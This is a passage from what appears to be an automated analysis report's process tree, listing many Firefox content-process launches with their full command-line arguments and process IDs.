      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12012 -childID 39 -isForBrowser -prefsHandle 12092 -prefMapHandle 12088 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba78b9fb-9839-46ac-bd73-64f525389f37} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:6084
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12232 -childID 40 -isForBrowser -prefsHandle 12244 -prefMapHandle 12248 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {87a39387-1ca3-41a0-9036-c042a3c4a543} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:1424
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12388 -childID 41 -isForBrowser -prefsHandle 12396 -prefMapHandle 12400 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f05b299b-2ece-46d3-8a55-694484f04b86} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:3788
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12592 -childID 42 -isForBrowser -prefsHandle 12672 -prefMapHandle 12668 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {460ddb9a-7ff4-470c-8e93-aeb76cfdf5b2} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:220
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12580 -childID 43 -isForBrowser -prefsHandle 12796 -prefMapHandle 12800 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ff34d534-77a4-459d-9b26-7fd01d816761} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:3292
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12996 -childID 44 -isForBrowser -prefsHandle 13008 -prefMapHandle 12952 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {489c62d0-6d52-4b2d-b00a-d49fc6a5c917} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:3036
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=13244 -childID 45 -isForBrowser -prefsHandle 13164 -prefMapHandle 13168 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bb5fd51d-4a45-42c4-8311-4d67e1f325af} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:2484
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=13352 -childID 46 -isForBrowser -prefsHandle 13360 -prefMapHandle 13364 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {53c0766c-f169-4763-aa48-8e9a89c597e9} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:5832
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=13640 -childID 47 -isForBrowser -prefsHandle 13560 -prefMapHandle 13568 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {305c899d-1041-47c8-b74b-d0a7b3644329} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:6728
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=13832 -childID 48 -isForBrowser -prefsHandle 13752 -prefMapHandle 13760 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {24eb3ee5-a960-4a58-80f4-3423637757aa} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:4600
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=13352 -childID 49 -isForBrowser -prefsHandle 13968 -prefMapHandle 13972 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f8fd9e6f-bb73-4e27-b410-331de92ba44e} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:3888
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=14208 -childID 50 -isForBrowser -prefsHandle 13948 -prefMapHandle 14132 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6d47168f-124b-4047-ba78-b1ed3e36c6b8} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:2576
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=14312 -childID 51 -isForBrowser -prefsHandle 14320 -prefMapHandle 14324 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7e166e2f-93c6-4e37-ab24-aad6b8573c62} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:5184
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=14596 -childID 52 -isForBrowser -prefsHandle 14516 -prefMapHandle 14520 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa4552f5-5bfb-43ae-bf78-467bd106a170} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:5476
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=14728 -childID 53 -isForBrowser -prefsHandle 14492 -prefMapHandle 14496 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {48f10ee4-2502-4aa0-89f7-d92d83be0648} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:4580
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=14892 -childID 54 -isForBrowser -prefsHandle 14900 -prefMapHandle 14904 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e18e4aa5-3efc-4088-9921-80a48edb51d9} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:4192
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=14716 -childID 55 -isForBrowser -prefsHandle 15108 -prefMapHandle 15112 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cd3196fb-a23a-47fc-9b85-7920dc3e2d0e} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:6824
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=15276 -childID 56 -isForBrowser -prefsHandle 15284 -prefMapHandle 15288 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ff3df4b0-57dd-4062-8682-ca37d1215c5b} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:5608
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=15472 -childID 57 -isForBrowser -prefsHandle 15480 -prefMapHandle 15484 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2d08303d-66b0-4718-912b-2b77721a7225} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:6820
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=15752 -childID 58 -isForBrowser -prefsHandle 15672 -prefMapHandle 15676 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1509dfdf-b0a5-41bb-aa7f-b457af5eeb4b} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:7160
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=15652 -childID 59 -isForBrowser -prefsHandle 15880 -prefMapHandle 15884 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2715fb45-2c7c-40aa-b86f-784eba12fe65} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:1308
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=16136 -childID 60 -isForBrowser -prefsHandle 16056 -prefMapHandle 16060 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cd445f47-93fa-443e-9dfe-f60cb4ab9153} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:5816
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=16336 -childID 61 -isForBrowser -prefsHandle 16256 -prefMapHandle 16264 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {143683a6-491d-4486-b0ad-f31a614772af} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:5752
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=16436 -childID 62 -isForBrowser -prefsHandle 16444 -prefMapHandle 16448 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {96135fc8-4388-41be-aa3d-5dc916064944} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:6404
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=16656 -childID 63 -isForBrowser -prefsHandle 16612 -prefMapHandle 16420 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {978a8953-e6a8-4489-8a9e-f2f94bcc541d} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:3768
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=16908 -childID 64 -isForBrowser -prefsHandle 16828 -prefMapHandle 16832 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a0137666-bcdf-4209-8cfd-6ac2ac8e60d2} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:3952
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=17100 -childID 65 -isForBrowser -prefsHandle 17020 -prefMapHandle 17024 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {28023ca8-b710-4a5d-b2f5-593556e16f66} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:3820
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=17300 -childID 66 -isForBrowser -prefsHandle 17220 -prefMapHandle 17228 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f6c541e-267d-40ff-872e-04e9bb4bffd6} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:3764
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=17396 -childID 67 -isForBrowser -prefsHandle 17404 -prefMapHandle 17412 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0ab90665-1760-4701-a8df-3812feedce33} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:6528
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=17592 -childID 68 -isForBrowser -prefsHandle 17600 -prefMapHandle 17604 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {395bee05-9ea0-4037-9ff3-d42f9c163077} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:5128
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=17808 -childID 69 -isForBrowser -prefsHandle 17884 -prefMapHandle 17880 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {40224b65-a686-428f-b0d9-61aaac9684c9} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:4572
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=17776 -childID 70 -isForBrowser -prefsHandle 18068 -prefMapHandle 18064 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cfbc1db8-d6d8-4a20-ac03-c215796c3875} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:4620
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=17800 -childID 71 -isForBrowser -prefsHandle 18196 -prefMapHandle 18200 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a494c49d-3aea-4ab9-9b8d-c1cbd2c1817f} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:6464
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=18380 -childID 72 -isForBrowser -prefsHandle 18388 -prefMapHandle 18392 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dba40733-7393-4034-b28b-bd953a5132d7} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:5532
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=18568 -childID 73 -isForBrowser -prefsHandle 18648 -prefMapHandle 18644 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b48bafea-09b2-4e5c-8f4b-345a663422e4} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:5232
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=18836 -childID 74 -isForBrowser -prefsHandle 18756 -prefMapHandle 18760 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd83f726-174d-4195-a5d7-428657ff35af} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:4336
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=18840 -childID 75 -isForBrowser -prefsHandle 18956 -prefMapHandle 18960 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6ac7d252-63c0-41c7-815a-07f8a553ca3c} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:7136
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=19220 -childID 76 -isForBrowser -prefsHandle 19140 -prefMapHandle 19144 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {27a4de77-c444-47cf-bc54-f1fe9e9b60f2} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:236
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=19500 -childID 77 -isForBrowser -prefsHandle 19492 -prefMapHandle 19488 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6e747617-bcb5-4cc6-a0cc-fdf1c7879e6f} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:5036
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=19516 -childID 78 -isForBrowser -prefsHandle 19656 -prefMapHandle 19660 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {93f74302-7cdb-497a-9b2e-d386f6323ed3} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:3748
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=19920 -childID 79 -isForBrowser -prefsHandle 19840 -prefMapHandle 19848 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ff2672d3-78c1-43b2-9ef8-d288254cec10} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:5652
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6344 -childID 80 -isForBrowser -prefsHandle 11880 -prefMapHandle 11876 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {17df3de3-7b40-4429-86fb-61ef07f187b3} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:3328
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11884 -childID 81 -isForBrowser -prefsHandle 10492 -prefMapHandle 10360 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {631478ef-f12c-45ba-94e6-4cc724d6a14f} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:1556
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5864 -childID 82 -isForBrowser -prefsHandle 11092 -prefMapHandle 11084 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e78f3536-cdb4-4383-a9db-c8fc7cdc84bb} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:4808
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10692 -childID 83 -isForBrowser -prefsHandle 6136 -prefMapHandle 6704 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3e2abec-e19c-4ea7-b8f5-8c4d2a8b19f8} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:5220
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=20080 -childID 84 -isForBrowser -prefsHandle 9672 -prefMapHandle 5296 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ab9cef07-7b80-40a0-812b-fabcf423c212} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:6256
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=20124 -childID 85 -isForBrowser -prefsHandle 20204 -prefMapHandle 20200 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d21917bd-a773-464f-aa69-032be6a21990} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:2300
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=20376 -childID 86 -isForBrowser -prefsHandle 20096 -prefMapHandle 20100 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e73a3f56-52e3-458c-a44d-df844b830052} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:3896
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=20520 -childID 87 -isForBrowser -prefsHandle 20528 -prefMapHandle 20532 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a1ddf793-9379-4c7a-adc3-f71ab63abc03} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:2056
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=20720 -childID 88 -isForBrowser -prefsHandle 20724 -prefMapHandle 20728 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6f97032e-fa8c-4e4a-85d3-437fdcdf8436} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:1004
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=21012 -childID 89 -isForBrowser -prefsHandle 20932 -prefMapHandle 20936 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f64a9b8f-541f-4d68-b15e-72ed5f112268} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:3464
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=21148 -childID 90 -isForBrowser -prefsHandle 21228 -prefMapHandle 21224 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ed38f27-d7cc-4ad4-99a0-6ace45fb6927} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:2736
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=21340 -childID 91 -isForBrowser -prefsHandle 21420 -prefMapHandle 21416 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b558de77-576e-4b7a-9c46-d829807495c5} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:6516
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=21524 -childID 92 -isForBrowser -prefsHandle 21532 -prefMapHandle 21536 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5cdb3f76-461d-46e9-9e59-02ce5df389a2} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:1484
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=21784 -childID 93 -isForBrowser -prefsHandle 21624 -prefMapHandle 21516 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {905ec51e-b0c7-4ae2-9501-5b6e3eb2934b} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:6492
  - - C:\Program Files\Mozilla Firefox\firefox.exe
